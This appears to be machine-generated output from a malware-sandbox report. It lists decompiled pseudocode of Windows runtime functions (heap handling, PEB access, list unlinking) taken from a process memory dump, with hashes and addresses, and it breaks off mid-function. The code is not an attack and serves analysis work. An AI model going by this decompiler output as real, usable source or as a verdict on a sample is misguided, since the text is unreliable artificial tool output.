Instruction ID: d0856298cd4c652d74644c93f004276a5963faf14c59e93b5594189ed759d5ce
Opcode Fuzzy Hash: b68a00bfaeb6935dc80fcd0c1cd8988814e72d8284e65674ae52c4b6dd6e50ba
Instruction Fuzzy Hash: 4621B7712081500FD785CB1AC8E85B6BFE5EFC622235BC1E5E98CCB746C624D916C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 03097794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E03097794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x3107b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L03034620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0305F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E03037D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E03059AE0();
					_t24 = L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x03097799
0x0309779a
0x0309779b
0x030977a3
0x030977ab
0x030977ae
0x030977b1
0x030977b1
0x030977bf
0x030977c4
0x030977c8
0x030977ce
0x030977d4
0x030977e0
0x030977e0
0x030977d6
0x030977d6
0x030977de
0x00000000
0x00000000
0x030977de
0x030977e5
0x030977f0
0x030977f3
0x030977f6
0x030977fd
0x03097800
0x0309780c
0x03097818
0x0309782b
0x0309781a
0x03097823
0x03097823
0x03097830
0x03097831
0x03097838
0x0309783d
0x0309783e
0x0309784f
0x0309784f
0x0309785a

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d31723deaef2d4eeb39af3e205c215ae29ecfb158db10f8bc9fea99f1a1afd4
Instruction ID: b7f75d999747a4ea1737c14bce86995998715a193006c3a9cccd176e2fc98729
Opcode Fuzzy Hash: 8d31723deaef2d4eeb39af3e205c215ae29ecfb158db10f8bc9fea99f1a1afd4
Instruction Fuzzy Hash: A4219F76511604ABCB25DF69DC80EABB7ACEF88740F1405AAF90ACB650D634E900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 030E1FF1, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E030E1FF1(void* __ecx, intOrPtr __edx, signed int _a4) {
				intOrPtr _v8;
				signed int _t22;
				signed int _t34;
				signed int _t38;
				signed int _t41;
				signed int _t42;
				signed int _t44;
				signed int _t54;
				signed int _t55;

				_t44 = _a4;
				_v8 = __edx;
				_t3 = _t44 + 0x1007; // 0x1007
				_t41 = _t3 & 0xfffff000;
				_t54 = ( *_t44 ^  *0x3106110 ^ _t44) >> 0x00000001 & 0x00007fff;
				if(_t41 - _t44 < _t54 << 3) {
					_t42 = _t41 + 0xfffffff0;
					_t34 = _t42 - _t44 >> 3;
					_t55 = _t54 - _t34;
					 *_t44 =  *_t44 ^ (_t34 + _t34 ^  *_t44 ^  *0x3106110 ^ _t44) & 0x0000fffe;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t22 = ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff) + ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff);
					 *_t42 = _t22;
					_t38 = _t42 + _t55 * 8;
					 *_t42 = _t22 ^  *0x3106110 ^ _t42;
					if(_t38 < _v8 + (( *(_v8 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t38 =  *_t38 ^ (_t55 << 0x00000010 ^  *0x3106110 ^ _t38 ^  *_t38) & 0x7fff0000;
					}
				} else {
					_t42 = 0;
				}
				return _t42;
			}

0x030e1ff9
0x030e1ffc
0x030e2001
0x030e200d
0x030e201b
0x030e2028
0x030e202e
0x030e2035
0x030e2038
0x030e204c
0x030e2052
0x030e2053
0x030e2054
0x030e2055
0x030e2069
0x030e206c
0x030e206e
0x030e2079
0x030e2087
0x030e209c
0x030e209c
0x030e202a
0x030e202a
0x030e202a
0x030e20a5

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d73d777ca3073f766d324c0c373fb213c165fd1072b20b5dc83d7b131d5f8c53
Instruction ID: abfb36afd0e6ec020eea64956bb9b669b931b223cc5c8515eb8565b80b9b1132
Opcode Fuzzy Hash: d73d777ca3073f766d324c0c373fb213c165fd1072b20b5dc83d7b131d5f8c53
Instruction Fuzzy Hash: 0321A233A104159F9B18DF7CC805566F7EAEFCC21532A467AD812DB2A5EAB0BD51C680

Uniqueness

Uniqueness Score: -1.00%

Function 0303AE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0303AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E03037D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E03037D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E03037D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E03037D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E03097794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x0303ae78
0x0303ae7c
0x0303ae7e
0x0303ae81
0x0303ae86
0x0303ae8d
0x03082691
0x0303ae93
0x0303ae93
0x0303ae93
0x0303ae98
0x0303ae9d
0x030826a2
0x030826b4
0x030826a4
0x030826ad
0x030826ad
0x030826b9
0x00000000
0x030826bb
0x00000000
0x030826bb
0x0303aea3
0x0303aea3
0x0303aea3
0x0303aeaa
0x030826c0
0x030826c9
0x030826c9
0x0303aeb3
0x030826d4
0x030826e1
0x00000000
0x00000000
0x030826e7
0x030826ee
0x030826f0
0x030826f9
0x030826f9
0x03082702
0x03082708
0x03082708
0x0308270b
0x0308270f
0x03082711
0x03082711
0x03082725
0x03082725
0x00000000
0x0303aeb9
0x0303aeb9
0x0303aebf
0x0303aebf
0x0303aeb3

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: ed44aa6a1bd593231cf36d0fae1fea6be4686671b663740536a83d8003785b9d
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: BB21D171A076849FDB26EF29C944B6677ECEF46750F0D08E0DD848B6A2E738DC50C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 0304FD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0304FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E030276E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L03034620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x0304fd9b
0x0304fda0
0x0304fda1
0x0304fdab
0x0304fdad
0x0304fdb0
0x0304fdb8
0x0304fe0f
0x0304fde6
0x0304fde9
0x0304fdec
0x0308c0c0
0x0304fdfe
0x0304fe06
0x0304fe06
0x0308c0c8
0x0304fe2d
0x0304fe2d
0x00000000
0x0304fe2d
0x0308c0d1
0x0308c0e0
0x0308c0e5
0x0308c0e5
0x0308c0e8
0x00000000
0x0308c0e8
0x0304fdf4
0x00000000
0x00000000
0x0304fdf6
0x0304fdfa
0x0304fe1a
0x0304fe1f
0x0304fe1f
0x0304fdfc
0x00000000
0x0304fdfc
0x0304fdcc
0x0304fdd0
0x0304fe26
0x00000000
0x0304fe26
0x0304fdd8
0x0304fddb
0x0304fddd
0x0304fde0
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: f62235d9a294885fc2ec1a212ad9507fe2be5d8704f60d98d3ed9538ec1e6c7c
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: C3218EB2642A46DFD731CF0AC540E66F7E9EB94A11F2985BEE9468B611D730DE00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0302841F, Relevance: .1, Instructions: 64
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E0302841F(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t43;
				signed int _t46;
				signed int _t50;
				signed int _t57;
				signed int _t64;

				_v16 = __ecx;
				_t43 =  *0x7ffe0004;
				_v8 = _t43;
				_t57 =  *0x7ffe0014 ^  *( *[fs:0x18] + 0x24) ^  *( *[fs:0x18] + 0x20) ^  *0x7ffe0018;
				_v12 = 0x7ffe0014;
				if(_t43 < 0x1000000) {
					while(1) {
						_t46 =  *0x7ffe0324;
						_t50 =  *0x7FFE0320;
						if(_t46 ==  *0x7FFE0328) {
							break;
						}
						asm("pause");
					}
					_t57 = _v12;
					_t64 = ((_t50 * _v8 >> 0x00000020 << 0x00000020 | _t50 * _v8) >> 0x18) + (_t46 << 8) * _v8;
				} else {
					_t64 = ( *0x7ffe0320 * _t43 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t43) >> 0x18;
				}
				_push(0);
				_push( &_v24);
				E03059810();
				return _t64 ^ _v20 ^ _v24 ^ _t57 ^ _v16;
			}

0x0302842f
0x03028448
0x0302844e
0x03028459
0x0302845b
0x03028464
0x03079ac3
0x03079ac3
0x03079ac5
0x03079acb
0x00000000
0x00000000
0x03079acd
0x03079acd
0x03079ad1
0x03079ae9
0x0302846a
0x03028475
0x03028479
0x0302847c
0x03028481
0x03028482
0x0302849a

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
Instruction ID: 8569cb067375697215829b513dc27e134a9fd9e6c8ba9e833e0792ac94c84a77
Opcode Fuzzy Hash: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
Instruction Fuzzy Hash: 8D219D76E01119DBCB14CFA9C580A9AF3F9FB88350FA64565E908B7744CB30AE04CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0304B390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0304B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E03032280(_t12, 0x3108608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E030500C2(0x3108608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x0304b395
0x0304b3a2
0x0304b3a5
0x0304b3aa
0x0304b3b2
0x0304b3ba
0x0304b3bd
0x0304b3c0
0x0304b3c4
0x0304b3c9
0x0308a3e9
0x0308a3ed
0x0308a3f0
0x0308a3ff
0x0308a403
0x0308a409
0x00000000
0x00000000
0x0308a40b
0x0308a40b
0x0308a40f
0x0308a415
0x0308a423
0x0308a423
0x0308a415
0x0304b3d1
0x0304b3e8
0x0304b3e8
0x0304b3d9

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03e1207926330fed5444d8dac2369f23d66337087fdf1747980baffc680b43cf
Instruction ID: 171a7b24c9d1926d5564e3f1598ab1326bf343a3eeeb0753b78b8637f57d147f
Opcode Fuzzy Hash: 03e1207926330fed5444d8dac2369f23d66337087fdf1747980baffc680b43cf
Instruction Fuzzy Hash: 741148773062149BCB18DA158E81A6F72AAEBC9730B290139ED569B780DA719C02C698

Uniqueness

Uniqueness Score: -1.00%

Function 03019240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E03019240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x30ef708);
				E0306D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E030595D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E030595D0();
				_t33 =  *0x31084c4; // 0x0
				L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x31084c4; // 0x0
				L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x31084c4; // 0x0
				E03032280(L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x31086b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E030595D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E030595D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E03019325();
					_t50 =  *0x31084c4; // 0x0
					return E0306D0D1(L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x03019240
0x03019242
0x03019247
0x0301924c
0x0301924e
0x03019255
0x03019257
0x0301925a
0x0301925f
0x0301925f
0x03019266
0x03019271
0x03019276
0x03019279
0x0301927e
0x03019295
0x0301929a
0x030192b1
0x030192b6
0x030192d7
0x030192dc
0x030192e0
0x030192e6
0x030192e8
0x030192ee
0x03019332
0x03019333
0x03019337
0x03019338
0x0301933a
0x0301933a
0x0301933d
0x03019342
0x03019342
0x03019345
0x03019349
0x0301934e
0x03019352
0x03019357
0x030192f4
0x030192f4
0x030192f6
0x030192f9
0x03019300
0x03019306
0x03019324
0x03019324

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 27bca1d6d5788117bc4a71196e35e34cc17442fefdcb99e23605302c9d3795c5
Instruction ID: 7a9b2a2a8598be83956c63eba0c41f99a6835a9e2d9e5f46fe279c7460d9a0de
Opcode Fuzzy Hash: 27bca1d6d5788117bc4a71196e35e34cc17442fefdcb99e23605302c9d3795c5
Instruction Fuzzy Hash: E1218E75142B04DFC765EF28CA10F9AB7F9FF48704F044568E0498B6A2CB74EA51CB98

Uniqueness

Uniqueness Score: -1.00%

Function 030A4257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E030A4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x30f08d0);
				E0306D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E030A41E8(__ebx, __edi, __ecx, _t39);
				E0302EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x31087e4;
					_t18 =  *0x31087e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x3105cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x31087e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x31087e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L03017055(_t31 + 0xfffffff8);
								_t24 =  *0x31087e0; // 0x0
								_t18 = _t24 - 1;
								 *0x31087e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x3105cd0;
				if( *0x3105cd0 <= 0) {
					L03017055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x31087e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x31087e8 = _t30;
						 *0x31087e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0306D0D1(L030A4320());
			}

0x030a4257
0x030a4257
0x030a4257
0x030a4259
0x030a425e
0x030a4263
0x030a4265
0x030a4273
0x030a4278
0x030a427c
0x030a427f
0x030a4281
0x030a4287
0x030a42d7
0x030a42d7
0x030a42da
0x030a428d
0x030a428d
0x030a428f
0x030a4292
0x030a4297
0x030a429c
0x030a42a0
0x030a42a6
0x030a42a8
0x030a42ae
0x030a42b3
0x00000000
0x030a42ba
0x030a42ba
0x030a42bf
0x030a42c5
0x030a42ca
0x030a42cf
0x030a42d0
0x00000000
0x030a42d0
0x030a42b3
0x00000000
0x030a42a6
0x030a429c
0x030a42dc
0x030a42dc
0x030a42e3
0x030a4309
0x030a42e5
0x030a42e5
0x030a42e8
0x030a42ee
0x030a42f0
0x00000000
0x030a42f2
0x030a42f2
0x030a42f4
0x030a42f7
0x030a42f9
0x030a4300
0x030a4300
0x030a42f0
0x030a430e
0x030a431f

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 831ba9c0ca1986f49d34d1e920d64b9fe87775df356aca0f5383cc2e76558a9d
Instruction ID: 502e2c8eccbc8cf1611a385fa4edc9c5ff3f3e330e8a2daa7f9eba610caffe4b
Opcode Fuzzy Hash: 831ba9c0ca1986f49d34d1e920d64b9fe87775df356aca0f5383cc2e76558a9d
Instruction Fuzzy Hash: 6A215B78906B00CFC759EFA9E100654B7E5FB89318BA482AAC1158F398D7B1D481CF14

Uniqueness

Uniqueness Score: -1.00%

Function 03042397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E03042397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x310848c != 0) {
					L0303FAD0(0x3108610);
					if( *0x310848c == 0) {
						E0303FA00(0x3108610, _t19, _t27, 0x3108610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E03042581(0x3108610, 0x2ff50a0, _t26, _t27, _t28);
						E0303FA00(0x3108610, 0x2ff50a0, _t27, 0x3108610);
					}
				} else {
					L1:
					_t11 =  *0x3108614; // 0x1
					if(_t11 == 0) {
						_t11 = E03054886(0x2ff1088, 1, 0x3108614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E03042581(0x3108610, (_t11 << 4) + 0x2ff5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x030423b0
0x030423b6
0x03042409
0x03042415
0x03085ae9
0x00000000
0x0304241b
0x0304241b
0x0304241d
0x03042427
0x0304242e
0x03042430
0x03042430
0x030423b8
0x030423b8
0x030423b8
0x030423bf
0x030423fc
0x030423fc
0x030423c1
0x030423c3
0x030423d0
0x030423d8
0x030423d8
0x030423dc
0x030423de
0x030423e1
0x030423e1
0x030423ec

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a254f4d543eeb6cb2f64386be452ce25715867fdffdb526a82f8f4a10dcbec1
Instruction ID: 9b311e73f20423f8fe3fa7b3ba90ec0570aed155b4ab5dffb6c99921cba1445c
Opcode Fuzzy Hash: 5a254f4d543eeb6cb2f64386be452ce25715867fdffdb526a82f8f4a10dcbec1
Instruction Fuzzy Hash: 37112BB2705701A7D760F629AC80B5EB6DCEBD4B51F194836F702EB191DAB0E940876C

Uniqueness

Uniqueness Score: -1.00%

Function 030946A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E030946A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L03034620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0305F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0304D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L030377F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x030946b7
0x030946ba
0x030946c5
0x030946c8
0x030946d0
0x030946d4
0x030946e6
0x030946e9
0x030946f4
0x030946ff
0x03094705
0x03094706
0x0309470c
0x03094713
0x0309471b
0x03094723
0x03094725
0x030946d6
0x030946d9
0x030946db
0x030946db
0x03094732

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 6b4b7ca8a0a2b93d11ccfeb9a528e1a4e2254574fcba10b4ece786ea8148bd38
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: A311C276505208BBCB05DF5D98808BEB7BDEF95300F1080AAF9448B351DA318D55D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0301C962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0301C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x310d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0302EEF0(0x31070a0);
